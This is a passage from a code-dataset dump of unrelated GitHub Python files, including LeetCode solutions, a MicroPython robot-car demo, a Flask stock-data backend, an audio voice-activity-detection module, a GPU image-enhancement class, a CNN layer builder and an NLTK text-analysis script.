res.append(dna)\n visited[dna] += 1\n return res\n ","repo_name":"IvanaGyro/LeetCode-Answer","sub_path":"0187_20190523_002838.py","file_name":"0187_20190523_002838.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40773985591","text":"# RobotCar demo with the NodeMCU shield for ESP8266\n# NodeMCU shield uses the chip L293D, which uses no I2C.\n# Speed motors are PWM-controlled. Separate pins for direction of the motors. \n# D4 controls also blue led (reverse logic), so it lights on when motor B goes backwards,\n\n# Very helpfull was following sites:\n# http://www.rudiswiki.de/wiki/WiFiCar-NodeMCU\n# https://smartarduino.gitbooks.io/user-mannual-for-esp-12e-motor-shield/content/how_to_get_it.html\n\n# 2017-0724 PePo new\nimport machine, bot, time\nimport motor\n\nprint('creating the 2 motors ...')\n# NodeMCU shield interface: http://www.rudiswiki.de/wiki/WiFiCar-NodeMCU\n#ESP12E Dev Kit Control Port:\n__D1 = 5 # GPIO05 motor PWMA -- left motor\n__D3 = 0 # GPIO00 motor dirA\n\n__D2 = 4 # GPIO04 motor PWMB -- right motor\n__D4 = 2 # GPIO02 motor dirB\n__FREQUENCY = 1600 # no idea what the value should be. Also working: 500\n\nleftMotor = motor.Motor(__D1, __D3, __FREQUENCY)\n#print('left motor:', leftMotor)\nprint('left motor - frequency = ', leftMotor.freq())\n\nrightMotor = motor.Motor(__D2, __D4, __FREQUENCY)\n#print('right motor:', rightMotor)\nprint('right motor - frequency = ', rightMotor.freq())\n\nprint('creating robot ...')\nrobot = bot.Robot(leftMotor, rightMotor)\n#print('robot:', robot)\n\ndt = 3 # duration in seconds\nspeed = 1023 # range: 0 .. 1023, effectively 600 - 1023\n# According to http://www.rudiswiki.de/wiki/WiFiCar-NodeMCU\n# motor start running if speed > 600 .. 1023\n# motor stops if speed < 300\nprint('robot turns {0}... left'.format(speed))\nrobot.left(speed, dt) #turn left\ntime.sleep(0.3)\n\nprint('robot turns {0}... right '.format(speed))\nrobot.right(speed, dt) # turn right\ntime.sleep(0.3)\n\nprint('robot moves {0}... forwards'.format(speed))\nrobot.forward(speed, dt) #forward\ntime.sleep(0.3)\n\nprint('robot moves {0} ... backwards'.format(speed))\nrobot.backward(speed, dt) #backwards\ntime.sleep(0.3)\n\nprint('robot ... 
stops')\nrobot.stops() #stops\nprint('done')\n","repo_name":"flashypepo/myMicropython-Examples","sub_path":"robotica/robotcar/nodemcu-motorshield/robot_demo.py","file_name":"robot_demo.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15284920101","text":"import logging\n\nfrom src.db import RidesTable\nfrom src.parameters import Parameters\nfrom src.utils import CMDs, Texts, print_out, convert_db_rows_to_str\n\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.DEBUG)\n\n\ndef retrieve_rides(params: Parameters) -> list:\n ''' Retrieve rides stored in DB.'''\n\n logging.info('Retrieving ride(s).')\n\n result = RidesTable.get_rides(args=params)\n \n return convert_db_rows_to_str(rows=result)\n\n\ndef register_ride(params: Parameters) -> None:\n ''' Register ride in DB.'''\n\n logging.info('Create ride.')\n\n res = RidesTable(\n from_city=params.from_city, \n to_city=params.to_city, \n date=params.from_date, \n num_seats=params.num_seats\n )\n res.commit()\n\n\ndef register_return_trip(params: Parameters) -> bool:\n ''' Register return-ride in DB.'''\n\n logging.info('Create return-trip.')\n\n last_ride = RidesTable.get_last_inserted()\n\n params.from_city = last_ride.to_city\n params.to_city = last_ride.from_city\n params.num_seats = last_ride.num_seats\n\n register_ride(params=params)\n\n\ndef handle_request(req: str):\n ''' Handles user requests.'''\n\n cmd_list = req.split(' ')\n\n cmd = cmd_list[0] # Get the cmd indicator, [S, C, R].\n\n cmd_list.pop(0) # Remove cmd indicator.\n\n args = cmd_list[:] # Make a new list, to reset indexing.\n\n params = Parameters(args=args)\n params.parse()\n\n # Create ride.\n if cmd in CMDs.create_ride:\n \n try:\n register_ride(params=params)\n\n except Exception as e:\n logging.error(\n f'Registering trip failed: {e}'\n )\n\n # Retrieve ride(s).\n elif cmd in CMDs.retrieve_ride:\n\n try:\n res = retrieve_rides(params=params)\n print_out(txt=res)\n \n except Exception as e:\n logging.error(\n f'Retreiving data failed: {e}'\n )\n\n # Create return ride.\n elif cmd in CMDs.create_return_ride:\n\n try:\n register_return_trip(params=params)\n\n except Exception as e:\n logging.error(\n f'Registering return trip failed: {e}'\n )\n\n\ndef wait_input():\n ''' Waiting user input in an infinite loop.'''\n\n val = input('>')\n \n # User quits.\n if val in CMDs.quit:\n print_out(Texts.farewell)\n quit()\n\n # User wants help, so display it.\n elif val in CMDs.help:\n print_out(Texts.help_txt)\n\n # Actual commands start here.\n else:\n\n handle_request(req=val)\n \n \n wait_input() # Start over, might be other requests.\n\n\ndef main():\n\n print(Texts.welcome)\n wait_input()","repo_name":"ByteByBit/go_more_or_less","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74503146705","text":"from flask import Flask, request\nfrom flask_cors import CORS \nimport flask\nimport json\nimport requests\nfrom datetime import datetime, timedelta \nfrom RealtimeDB import RealtimeDB \nimport key_variables\n\ntheDB = RealtimeDB()\nAPI_KEY = key_variables.API_KEY\nyesterday = (datetime.today() - timedelta(days = 1)).strftime('%Y-%m-%d')\ntoday = datetime.today().strftime('%Y-%m-%d')\n\nStocksFirst = Flask(__name__)\nCORS(StocksFirst)\n\n@StocksFirst.route(\"/\", methods=[\"GET\", \"POST\"])\n\ndef data():\n 
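# GET: return top-gainer data (from the DB cache, falling back to the AlphaVantage API);\n    # POST: look up a ticker's recent daily series and return graph-ready JSON\n    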
print(\"Data endpoint reached.\")\n print(request.method)\n\n if request.method == \"GET\":\n url = 'https://www.alphavantage.co/query?function=TOP_GAINERS_LOSERS&apikey='+API_KEY\n\n #Check DB if top performer data is there\n # Send data back to landing page\n content = theDB.get_top_performer_data()\n print(content)\n if content == None:\n #Get it from the API and write it to the database\n print(\"Doing API call\")\n api_call = requests.get(url)\n data = api_call.json()\n \n last_updated = data[\"last_updated\"][0:10]\n tmp = list(data[\"top_gainers\"])\n top_gainers = []\n for el in range(0, 4):\n top_gainers.append(tmp[el])\n \n \n content = dict()\n content[last_updated] = top_gainers\n print(content)\n theDB.write_top_performer_data(content)\n\n print(content)\n return flask.Response(response = content, status=200)\n \n if request.method == \"POST\":\n ticker = request.get_json()[\"data\"].upper()\n if '+' in ticker:\n ticker = ticker.replace('+', '')\n #print(ticker)\n\n #Check the DB if we have data already, and if there's anything current.\n content = theDB.get_search_history(ticker)\n if not content:\n url = 'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol='+ticker+'&apikey='+API_KEY\n api_call = requests.get(url)\n data = api_call.json()\n\n #Data is not recorded for the weekends so careful not to break the site\n\n days = list(data[\"Time Series (Daily)\"])\n current_data = data[\"Time Series (Daily)\"][days[0]]\n\n title = theDB.get_co_name(ticker)\n last_search = {ticker: {title: {\"Open\": current_data[\"1. open\"], \n \"High\": current_data[\"2. high\"],\n \"Low\": current_data[\"3. low\"],\n \"Close\": current_data[\"4. close\"],\n \"Volume\": current_data[\"5. volume\"]}}}\n daily_values = []\n ticker_node = {}\n\n #Gets last seven days of data for given stock. \n for i in range(0,7):\n current_data = data[\"Time Series (Daily)\"][days[i]]\n ticker_node[days[i]]= {\"Open\": current_data[\"1. open\"],\n \"High\": current_data[\"2. high\"],\n \"Low\": current_data[\"3. low\"],\n \"Close\": current_data[\"4. close\"],\n \"Volume\": current_data[\"5. 
volume\"]\n                                }\n                last_search = {ticker: {title: ticker_node}}\n                print(\"Printing daily values:\")\n                theDB.write_search_history(last_search)\n                content = theDB.get_search_history(ticker)\n\n        graph_values = theDB.get_graph_data(content)\n        print(json.dumps(graph_values, indent=4))\n        return flask.Response(response=json.dumps(graph_values,indent=4),status=200)\n\n\nif __name__ == \"__main__\":\n    StocksFirst.run(\"localhost\", 6969) ","repo_name":"Tristochi/StocksFirst","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44268540242","text":"# Binary search tree to doubly linked list. This is really a doubly-linked-list problem, and the key is the recursive idea: for the current root,\n# recurse on the left subtree to get the head and tail nodes (Lh, Lt) of its finished list, then recurse on the right subtree to get the head\n# and tail nodes (Rh, Rt) of its finished list; then root.left = Lt and root.right = Rh.\n# Mind the edge cases: if the left subtree is empty, root becomes Lh; if the right subtree is empty, root becomes Rt;\n# if both are empty, just return None, None.\n\"\"\"\n# Definition for a Node.\nclass Node(object):\n    def __init__(self, val, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\"\"\"\nclass Solution(object):\n    def treeToDoublyList(self, root):\n        \"\"\"\n        :type root: Node\n        :rtype: Node\n        \"\"\"\n        if not root:\n            return\n        Lh,Rt = self.func(root)\n        Lh.left = Rt\n        Rt.right = Lh\n        return Lh\n\n    def func(self,root):\n        if not root:\n            return None,None\n        Lh,Lt = self.func(root.left)\n        Rh,Rt = self.func(root.right)\n        root.left = Lt\n        if Lt:\n            Lt.right = root\n        else:\n            Lh = root\n        root.right = Rh\n        if Rh: \n            Rh.left = root\n        else:\n            Rt = root\n        return Lh,Rt","repo_name":"whywhs/Leetcode","sub_path":"meet36_M.py","file_name":"meet36_M.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30416638166","text":"import os\nimport time\nfrom pprint import pprint\n\nimport numpy as np\nimport torch\nfrom IPython.display import Audio\nfrom pydub import AudioSegment\nfrom web.database.sqlite_util import saveVoiceRecord\nfrom flask import send_file\nimport soundfile as sf\n# from main import SAMPLING_RATE\nimport noisereduce as nr\n# from noisereduce.utils import get_noise\n# @app.route('/upload', methods=['GET', 'POST'])\n# def upload_file():\n#     # render the upload page\n#     return render_template('upload.html')\nfrom pydub.silence import split_on_silence\n# Directory where uploaded files are saved; adjust to the actual file layout.\n# If no directory is given, f.save(f.filename) saves to the current folder by default.\n# The upload save path may be an absolute or a relative path (both tested).\n# Assign the path to a variable.\nfrom .utils_vad import init_jit_model,get_speech_timestamps,save_audio,read_audio,collect_chunks\nclass VadModel():\n\n    def __init__(self):\n        self.cur_path = os.path.dirname(os.path.realpath(__file__))\n        self.upload_folder = os.path.join(os.getcwd(),\"web/static/upload\")\n        self.output_folder = os.path.join(os.getcwd(),\"web/static/output\")\n        self.SAMPLING_RATE = 16000\n        self.use_onnx = False\n        # initialize the model and helpers\n        # TODO: this is a single-threaded setup; check whether the model supports multi-threaded use\n        self.model = init_jit_model(os.path.join(os.path.dirname(os.path.realpath(__file__)),'files/silero_vad.jit'))\n\n    def fotmat2Wav(self,output_folder, voice_list):\n        # TODO: regex-check whether the filename ends in .wav; if not, convert it to wav\n        # create the input and output folders\n        # ouput_folder = os.path.join(source_folder, \"output\")\n        # extract the file name\n        wav_list = []\n        if not os.path.exists(output_folder):\n            print(\"output folder does not exist\")\n            os.mkdir(output_folder)\n        # if the file is mp3 or m4a, convert it to wav\n        for item in voice_list:\n            wav_name = item.split(\"\\\\\")[-1].split(\".\")[0]\n            print(item)\n            print(wav_name)\n            sound = AudioSegment.from_file(item)\n            
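# pydub hands decoding to ffmpeg, so any supported container (mp3, m4a, ...) loads here\n            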
sound_len = sound.duration_seconds\n            sound.export(\"%s.wav\" % (wav_name), format=\"wav\")\n            wav_list.append(\"%s.wav\" % (wav_name))\n        return wav_list,sound_len\n\n    def split_audio_by_energy(self, audio, min_silence_len=1000, silence_thresh=-50, energy_thresh=200):\n        samples = np.array(audio.get_array_of_samples())\n        samples = samples.astype(np.float32) / np.iinfo(samples.dtype).max\n        samples = np.abs(samples)\n        energy = np.convolve(samples, np.ones(min_silence_len), mode='valid')\n        silence_mask = energy < energy_thresh\n        split_points = np.where(np.diff(silence_mask.astype(int)) == 1)[0] + min_silence_len // 2\n        split_points = np.concatenate(([0], split_points, [len(samples)]))\n        audio_chunks = [audio[start:end] for start, end in zip(split_points[:-1], split_points[1:])]\n        return audio_chunks\n\n    def denoise(self,wav_file_path):\n        print(\"Removing background noise...\")\n        print(wav_file_path)\n        # load a noise sample so the model can strip similar noise from the target file\n        noise_data, sample_rate = sf.read(os.path.join(self.cur_path,'noise.wav'))\n        noise_data = noise_data.astype('float32')\n        audio = AudioSegment.from_file(wav_file_path, format='wav')\n        # convert to mono\n        # audio = audio.set_channels(1)\n        # audio_chunks = split_on_silence(\n        #     audio,\n        #     min_silence_len=500,  # minimum silence length\n        #     silence_thresh=-50,  # silence threshold\n        #     keep_silence=500  # silence kept after splitting\n        # )\n        audio_chunks = audio[::2000]\n        for i, chunk in enumerate(audio_chunks):\n            # apply the noise-reduction algorithm\n            # chunk_array = chunk.get_array_of_samples()\n            chunk_array = nr.reduce_noise(audio_clip=chunk, noise_clip=noise_data, verbose=False)\n            chunk = chunk._spawn(chunk_array)\n            # save the audio chunk\n            chunk.export(f\"audio_chunk_{i}.wav\", format=\"wav\")\n        # chunking\n        # output_audio = audio_chunks[0]\n        # for i in range(1, len(audio_chunks)):\n        #     output_audio += audio_chunks[i]\n        # output_audio.export('output_result.wav', format='wav')\n        # noise_clip = noise_data[0:sample_rate]\n        # noise_profile = get_noise(noise_clip,sample_rate)\n        # TODO: a single audio file is too large; process it in chunks, then merge them back into one complete recording\n\n        # data,sample_rate = sf.read(wav_file_path)\n        # reduced_noise = reduce_noise(audio_clip=data, noise_clip=noise_data[0:sample_rate], verbose=False)\n        # sf.write(wav_file_path,reduced_noise,sample_rate)\n        print(\"Noise removal finished...\")\n\n    # analyze the given audio file and extract the speech segments\n    def start(self,filepath):\n        print(\"Converting audio format....\")\n        source_path = os.path.join(self.upload_folder, \"%s\" % filepath)\n        # the source file must be converted to wav\n        source_file_stats = os.stat(source_path)\n        print(\"source file to recognize %s :%d byte\"%(source_path,source_file_stats.st_size))\n        # TODO: only one file is recognized for now; later this could be a whole list\n        voice_list = []\n        voice_list.append(source_path)\n        wav_list,sound_len = self.fotmat2Wav(self.output_folder,voice_list)\n        print(\"file duration: %d\" % sound_len)\n        print(wav_list)\n        print(\"Format conversion done.\")\n        start_time = time.time()\n        for wav_file in wav_list:\n            # TODO: need a step that strips background noise\n            wav_stats = os.stat(wav_file)\n            print(\"wav file size = %d\"%wav_stats.st_size)\n            wav = read_audio('%s' % wav_file, sampling_rate=self.SAMPLING_RATE)\n            # get speech timestamps from full audio file\n            st = get_speech_timestamps(wav, self.model, sampling_rate=self.SAMPLING_RATE, threshold=0.8)\n            pprint(st)\n            voice_section = []\n            for i in range(len(st) - 1, -1, -1):\n                # cut out segments that are too short; they are usually noise, while real speech is continuous\n                if(st[i]['end']-st[i]['start']<10000):\n                    st.pop(i)\n                    continue\n                voice_section.append([st[i]['start']/self.SAMPLING_RATE/sound_len,st[i]['end']/self.SAMPLING_RATE/sound_len])\n                print(\"start - end - total frames: %d - %d - %d\"%(st[i]['start'],st[i]['end'],st[i]['end']-st[i]['start']))\n\n            # at a 16000 Hz sampling rate 1 s corresponds to timestamp 16000, 2 s to 32000, and so on;\n            # convert every segment into its percentage position within the whole audio\n            print(\"percentage intervals of the audio that contain speech:\")\n            # store it in the database\n            print(voice_section)\n            
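# next: splice the detected speech chunks together and save them as one wav file\n            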
print(\"Saving the merged recording\")\n            target_path = os.path.join(self.output_folder, \"%s\" % wav_file)\n            print(\"target_path = %s\" % target_path)\n            speech_chunks = collect_chunks(st, wav)\n            save_audio(target_path, speech_chunks, sampling_rate=self.SAMPLING_RATE)\n            print(\"Got the positions of speech within the audio\")\n            Audio(target_path)\n            print(\"Audio converted successfully: %s, took %d s\" % (target_path, time.time() - start_time))\n            # add the generated data to the database\n            saveVoiceRecord(filepath,sound_len,voice_section)\n            # stream the file down to the browser\n            send_file(target_path, as_attachment=True)\n            start_time = time.time()\n\n","repo_name":"mutengchen/jr_vad","sub_path":"vad/VadModel.py","file_name":"VadModel.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74583662866","text":"import cv2\nimport numpy as np\nimport torch\nfrom kornia.color import hsv_to_rgb, rgb_to_hsv\nfrom torch.fft import fft2, fftshift, ifft2\nfrom torchvision.io import read_image\nfrom torchvision.transforms.functional import resize, rgb_to_grayscale\n\nfrom .utils import cart2pol_torch\n\n\nclass VEVID_GPU:\n    def __init__(self, device, h=None, w=None):\n        \"\"\"initialize the VEVID GPU version class\n\n        Args:\n            device (torch.device)\n            h (int, optional): height of the image to be processed. Defaults to None.\n            w (int, optional): width of the image to be processed. Defaults to None.\n        \"\"\"\n        self.h = h\n        self.w = w\n        self.device = device\n\n    def load_img(self, img_file=None, img_array=None):\n        \"\"\"load the image from an ndarray or from an image file\n\n        Args:\n            img_file (str, optional): path to the image. Defaults to None.\n            img_array (torch.Tensor, optional): image in the form of torch.Tensor. Defaults to None.\n        \"\"\"\n        if img_array is not None:\n            # directly load the image from the array instead of the file\n            if img_array.get_device() == self.device:\n                self.img_rgb = img_array\n            else:\n                self.img_rgb = img_array.to(self.device)\n            if not self.h and not self.w:\n                self.h = self.img_rgb.shape[-2]\n                self.w = self.img_rgb.shape[-1]\n            # convert from RGB to HSV\n            self.img_hsv = rgb_to_hsv(self.img_rgb)\n\n        else:\n            # load the image from the image file\n            # torchvision read_image currently only supports 'jpg' and 'png'\n            # use opencv to read other image formats\n            if img_file.split(\".\")[-1] in [\"jpg\", \"png\", \"jpeg\"]:\n                self.img_rgb = read_image(img_file).to(self.device)\n            else:\n                self.img_bgr = cv2.imread(img_file)\n                self.img_rgb = cv2.cvtColor(self.img_bgr, cv2.COLOR_BGR2RGB)\n                self.img_rgb = torch.from_numpy(\n                    np.transpose(self.img_rgb, (2, 0, 1))\n                ).to(self.device)\n            if not self.h and not self.w:\n                self.h = self.img_rgb.shape[-2]\n                self.w = self.img_rgb.shape[-1]\n            else:\n                self.img_rgb = resize(self.img_rgb, [self.h, self.w])\n            # convert from RGB to HSV\n            # rgb_to_hsv in kornia requires the input RGB image to be in the range of 0-1\n            self.img_hsv = rgb_to_hsv((self.img_rgb.float()) / 255.0)\n\n    def init_kernel(self, S, T):\n        \"\"\"initialize the phase kernel of VEViD\n\n        Args:\n            S (float): phase strength\n            T (float): variance of the spectral phase function\n        \"\"\"\n        # create the frequency grid\n        u = torch.linspace(-0.5, 0.5, self.h, device=self.device).float()\n        v = torch.linspace(-0.5, 0.5, self.w, device=self.device).float()\n        [U, V] = torch.meshgrid(u, v, indexing=\"ij\")\n        # construct the kernel\n        [self.THETA, self.RHO] = cart2pol_torch(U, V)\n        self.vevid_kernel = torch.exp(-self.RHO**2 / T)\n        self.vevid_kernel = (self.vevid_kernel / torch.max(abs(self.vevid_kernel))) * S\n\n    def apply_kernel(self, b, G, color=False, 
lite=False):\n \"\"\"apply the phase kernel onto the image\n\n Args:\n b (float): regularization term\n G (float): phase activation gain\n color (bool, optional): whether to run color enhancement. Defaults to False.\n lite (bool, optional): whether to run VEViD lite. Defaults to False.\n \"\"\"\n if color:\n channel_idx = 1\n else:\n channel_idx = 2\n vevid_input = self.img_hsv[channel_idx, :, :]\n if lite:\n vevid_phase = torch.atan2(-G * (vevid_input + b), vevid_input)\n else:\n vevid_input_f = fft2(vevid_input + b)\n img_vevid = ifft2(\n vevid_input_f * fftshift(torch.exp(-1j * self.vevid_kernel))\n )\n vevid_phase = torch.atan2(G * torch.imag(img_vevid), vevid_input)\n vevid_phase_norm = (vevid_phase - vevid_phase.min()) / (\n vevid_phase.max() - vevid_phase.min()\n )\n self.img_hsv[channel_idx, :, :] = vevid_phase_norm\n self.vevid_output = hsv_to_rgb(self.img_hsv)\n\n def run(self, img_file, S, T, b, G, color=False):\n \"\"\"run the full VEViD algorithm\n\n Args:\n img_file (str): path to the image\n S (float): phase strength\n T (float): variance of the spectral phase function\n b (float): regularization term\n G (float): phase activation gain\n color (bool, optional): whether to run color enhancement. Defaults to False.\n\n Returns:\n torch.Tensor: enhanced image\n \"\"\"\n self.load_img(img_file=img_file)\n self.init_kernel(S, T)\n self.apply_kernel(b, G, color, lite=False)\n\n return self.vevid_output\n\n def run_lite(self, img_file, b, G, color=False):\n \"\"\"run the VEViD lite algorithm\n\n Args:\n img_file (str): path to the image\n b (float): regularization term\n G (float): phase activation gain\n color (bool, optional): whether to run color enhancement. Defaults to False.\n\n Returns:\n torch.Tensor: enhanced image\n \"\"\"\n self.load_img(img_file=img_file)\n self.apply_kernel(b, G, color, lite=True)\n\n return self.vevid_output\n","repo_name":"JalaliLabUCLA/phycv","sub_path":"phycv/vevid_gpu.py","file_name":"vevid_gpu.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","stars":457,"dataset":"github-code","pt":"48"} +{"seq_id":"3139387181","text":"# https://leetcode.cn/problems/largest-magic-square/\n# 1895. 
Largest Magic Square\nclass Solution:\n    def largestMagicSquare(self, grid: List[List[int]]) -> int:\n        n = len(grid)\n        m = len(grid[0])\n        g = [[0] * (m+1) for i in range(n+1)]\n        \n        for i, row in enumerate(grid):\n            for j, x in enumerate(row):\n                g[i+1][j+1] = x + g[i+1][j] + g[i][j+1] - g[i][j]\n        \n        # for row in g:\n        #     print(row)\n        \n        def is_magic(i, j, k):\n            # print(f'is_magic({i}, {j}, {k})')\n            s = g[i+k][j+k] - g[i][j+k] - g[i+k][j] + g[i][j]\n            # print(f's = {s}')\n            if s % k > 0:\n                return False\n            r = s // k\n            # print(f'r = {r}')\n            for ii in range(i, i+k):\n                si = g[ii+1][j+k] - g[ii][j+k] - g[ii+1][j] + g[ii][j]\n                # print(ii, si)\n                if si != r:\n                    return False\n            for jj in range(j, j+k):\n                sj = g[i+k][jj+1] - g[i][jj+1] - g[i+k][jj] + g[i][jj]\n                # print(jj, sj)\n                if sj != r:\n                    return False\n            s1 = 0\n            s2 = 0\n            for ii in range(k):\n                s1 += grid[i+ii][j+ii]\n                s2 += grid[i+k-1-ii][j+ii]\n            if s1 != r or s2 != r:\n                return False\n            return True\n        \n        for k in range(min(n, m), 0, -1):\n            for i in range(n+1-k):\n                for j in range(m+1-k):\n                    if is_magic(i, j, k):\n                        return k\n        return 1\n        \n","repo_name":"fish-ball/leetcode","sub_path":"algorithms/leet.1895.src.1.py","file_name":"leet.1895.src.1.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73874773264","text":"from src.data.constants import LayerType\nfrom src.model.activations import ReLUActivation, NonActivation\nfrom src.model.layers import ConvLayer, PoolLayer, FlattenLayer, np, HiddenLayer, TestingLayer\n\nfrom src.utils.processing import parseJSON\n\nACTIVATIONS_MAP = {'RELU': ReLUActivation(), \"NON\": NonActivation()}\n\n\nclass LayersBuilder(object):\n    def __init__(self):\n        self.__layersConfig = []\n\n    def addLayer(self, config):\n        self.__layersConfig.append(config)\n\n    def build(self, hyperParams, inputDimensions, fullyConnectedN, outputClasesN):\n        totalDepth = 1\n        poolingN = 0\n        hiddenN = 0\n        hiddenLayerPresent = False\n        firstConv = True\n        for config in self.__layersConfig:\n            if config[0] == LayerType.CONV:\n                totalDepth = config[1].filter_number\n            if config[0] == LayerType.POOLING:\n                poolingN += 1\n            if config[0] == LayerType.HIDDEN:\n                hiddenN += 1\n        inputShrink = np.power(2, poolingN)\n        fHiddenInput = int(inputDimensions[0] * inputDimensions[1] / np.power(inputShrink, 2) * totalDepth)\n        layers = []\n        convDepth = 1\n        for config in self.__layersConfig:\n            if config[0] == LayerType.CONV:\n                if (firstConv):\n                    layers.append((ConvLayer(params=config[1], hyperParams=hyperParams,\n                                             activation=ACTIVATIONS_MAP[config[1].activation]),\n                                   LayerType.CONV))\n                    firstConv = False\n                else:\n\n                    layers.append((ConvLayer(params=config[1], hyperParams=hyperParams,\n                                             activation=ACTIVATIONS_MAP[config[1].activation], inputDepth=convDepth),\n                                   LayerType.CONV))\n                convDepth = config[1].filter_number\n\n            elif config[0] == LayerType.POOLING:\n                layers.append((PoolLayer(), LayerType.POOLING))\n            elif config[0] == LayerType.FLAT:\n                layers.append((FlattenLayer(), LayerType.FLAT))\n            elif config[0] == LayerType.HIDDEN:\n                if not hiddenLayerPresent and hiddenN != 1:\n                    layers.append((HiddenLayer(fHiddenInput,\n                                               fullyConnectedN, ACTIVATIONS_MAP[config[1].activation], hyperParams),\n                                   LayerType.HIDDEN))\n                    hiddenLayerPresent = True\n                elif not hiddenLayerPresent and hiddenN == 1:\n                    layers.append((HiddenLayer(fHiddenInput,\n                                               outputClasesN, ACTIVATIONS_MAP[config[1].activation], hyperParams),\n                                   LayerType.HIDDEN))\n                    hiddenLayerPresent = True\n                elif hiddenN > 1:\n                    layers.append((HiddenLayer(fullyConnectedN, 
fullyConnectedN, ACTIVATIONS_MAP[config[1].activation],\n hyperParams),\n LayerType.HIDDEN))\n else:\n layers.append((HiddenLayer(fullyConnectedN, outputClasesN, ACTIVATIONS_MAP[config[1].activation],\n hyperParams),\n LayerType.HIDDEN))\n hiddenN -= 1\n elif config[0] == LayerType.TEST:\n layers.append((TestingLayer(fHiddenInput, outputClasesN), LayerType.TEST))\n return layers\n\n def reconstruct(self, modelJson):\n layers = []\n data = parseJSON(modelJson)\n for layer in data.model.layers:\n print(layer, '\\n')\n if (layer.type == 'CONV'):\n if (layer.activation == 'RELU'):\n activation = ReLUActivation()\n else:\n activation = NonActivation()\n layers.append((ConvLayer(activation=activation, filters=layer.weights, stride=layer.convParams.stride),\n LayerType.CONV))\n elif (layer.type == 'POOLING'):\n layers.append((PoolLayer(), LayerType.POOLING))\n elif (layer.type == 'FLAT'):\n layers.append((FlattenLayer(), LayerType.FLAT))\n elif (layer.type == 'HIDDEN'):\n layers.append((HiddenLayer(weights=layer.weights, biases=layer.biases), LayerType.FLAT))\n sampleData = np.asarray(data.model.sample.data)\n sampleRaw = np.asarray(data.model.sample.result)\n sampleProbabilities = np.asarray(data.model.sample.probabilities)\n return layers, (sampleData, sampleRaw, sampleProbabilities)\n","repo_name":"alexbajzat/Musical-Notes-Recognition-CNN","sub_path":"src/model/layers_builder.py","file_name":"layers_builder.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"73697673744","text":"from nltk.corpus import wordnet as wn \t\t# For finding the categories of nouns and verbs \r\nfrom textblob import TextBlob \t\t\t# For pos tagging to find nouns and verbs from the data\r\nimport matplotlib.pyplot as plt \t\t# For plotting frequency histograms\r\nimport spacy\t\t\t\t\t# For entity recognition and relationship\r\n\r\n# Opening book - 1 and reading its data in 'T1'\r\nf1 = open('book1023.txt', 'r', encoding = 'utf-8')\r\nT1 = f1.read()\r\n# Opening book - 2 and reading its data in 'T2'\r\nf2 = open('book2600.txt', 'r', encoding = 'utf-8')\r\nT2 = f2.read()\r\n# Converting the data in 't1' and 't2' to lower-case\r\nt1 = T1.lower()\r\nt2 = T2.lower()\r\n\r\n# Identifying nouns and verbs from present in 't1', i.e., Book-1\r\nnoun1 = [w for (w, pos) in TextBlob(t1).pos_tags if pos[0] == 'N']\r\nverb1 = [w for (w, pos) in TextBlob(t1).pos_tags if pos[0] == 'V']\r\n# Identifying nouns and verbs from present in 't2', i.e., Book-2\r\nnoun2 = [w for (w, pos) in TextBlob(t2).pos_tags if pos[0] == 'N']\r\nverb2 = [w for (w, pos) in TextBlob(t2).pos_tags if pos[0] == 'V']\r\n\r\n# Creating an empty list that will contain the category of the noun for each word present in the list 'noun1' \r\nnoun_wordnet1 = []\r\n# Finding the category of noun for each word present in the list 'noun1' and appending it in the list 'noun_wordnet1'\r\nfor x in range(len(noun1)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(noun1[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tnoun_wordnet1.append(col[0])\r\n\telse:\r\n\t\tnoun_wordnet1.append(\"noun.person\")\r\n\r\n# Creating an empty list that will contain the category of the verb for each word present in the list 'verb1' \r\nverb_wordnet1 = []\r\n# Finding the category of verb for each word present in the list 'verb1' and appending it in the list 'verb_wordnet1'\r\nfor x in range(len(verb1)):\r\n\tcol = []\r\n\tfor synset in 
wn.synsets(verb1[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tverb_wordnet1.append(col[0])\r\n\telse:\r\n\t\tverb_wordnet1.append(\"verb.stative\")\r\n\r\n# Creating an empty list that will contain the category of the noun for each word present in the list 'noun2' \r\nnoun_wordnet2 = []\r\n# Finding the category of noun for each word present in the list 'noun2' and appending it in the list 'noun_wordnet2'\r\nfor x in range(len(noun2)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(noun2[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 0:\r\n\t\tnoun_wordnet2.append(col[0])\r\n\telse:\r\n\t\tnoun_wordnet2.append(\"noun.person\")\r\n\r\n# Creating an empty list that will contain the category of the verb for each word present in the list 'verb2' \r\nverb_wordnet2 = []\r\n# Finding the category of verb for each word present in the list 'verb2' and appending it in the list 'verb_wordnet2'\r\nfor x in range(len(verb2)):\r\n\tcol = []\r\n\tfor synset in wn.synsets(verb2[x]):\r\n\t\tcol.append(synset.lexname())\r\n\tif len(col) != 